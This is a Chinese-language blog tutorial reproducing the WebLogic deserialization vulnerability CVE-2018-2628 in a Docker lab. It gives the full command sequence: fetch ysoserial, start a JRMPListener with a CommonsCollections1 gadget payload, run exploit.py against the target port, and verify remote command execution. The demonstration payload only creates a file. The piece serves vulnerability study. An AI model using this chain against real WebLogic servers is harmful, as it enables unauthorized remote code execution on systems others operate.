0.先提幾個概念

JRMP:java remote method protocol，Java遠程方法協議
JRMP是的Java技術協議的具體對象為希望和遠程引用。JRMP只能是一個Java特有的,基于流的協議。相對于的RMI - IIOP的 ，該協議JRMP只能是一個對象的Java到Java的遠程調用，這使得它依賴語言，意思是客戶端和服務器必須使用Java。
JRMP:Java遠程消息交換協議JRMP（Java Remote Messaging Protocol）
該協議基于TCP/IP，既然是作為信息交換協議，必然存在接收和發送兩個端點，JRMPListener可以粗糙的理解為發送端，在本實驗中意為攻擊機上1099端口與weblogic靶機上的7001進行通信達到遠程命令執行的目的。

1.安裝靶機環境

docker pull zhiqzhao/ubuntu_weblogic1036_domain docker run -d -p 7001:7001 zhiqzhao/ubuntu_weblogic1036_domain

#這里直接使用大佬配置好的環境

2.在JRMPListener主機上運行命令

這里采用的是Ubuntu16.04+docker，docker容器作為weblogic靶機，在此JRMPListener主機指的是Ubuntu16.04。

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/sss666.txt' #'touch /tmp/sss666.txt'為我想執行的命令，1099是JRMP Server監聽的端口。

圖中的172.17.0.2的ip為docker靶機的ip
3.運行exploit腳本

python exploit.py 172.17.0.2 7001 ../ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.185.43.215 1099 JRMPClien #172.17.0.2 7001是weblogic靶機的IP和端口 #../ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 是ysoserial的本地路徑根據自己真實路徑填寫 #10.185.43.215 1099的JRMP 一端的IP地址和端口 #JRMPClien是執行JRMPClient的類

4.進入docker靶機查看文件是否創建成功

docker exec -ti determined_stonebrak /bin/bash #determined_stonebrak是我的docker靶機的名字，每個人創建的名字都不一樣可使用docker ps查看NAME ls /tmp/

總結

以上是生活随笔為你收集整理的weblogic(CVE-2018-2628漏洞复现)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。